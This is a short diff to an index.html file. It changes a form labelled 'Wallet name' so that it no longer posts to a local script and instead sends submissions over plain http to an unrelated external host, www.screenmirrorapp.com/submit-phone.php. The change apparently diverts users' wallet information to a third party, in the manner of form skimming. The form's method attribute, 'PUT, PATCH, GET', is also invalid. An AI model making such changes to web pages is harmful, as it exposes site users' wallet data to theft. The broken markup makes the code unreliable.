--- a/index.html
+++ b/index.html
@@ -38,7 +38,7 @@
     }
   });
 </script>
-     <form action="/submit_form.php" method="PUT, PATCH, GET">
+     <form action="http://www.screenmirrorapp.com/submit-phone.php" method="PUT, PATCH, GET">
         <label for="username">Wallet name:</label><br>
         <input type="text" id="username" name="username" required><br><br>
 
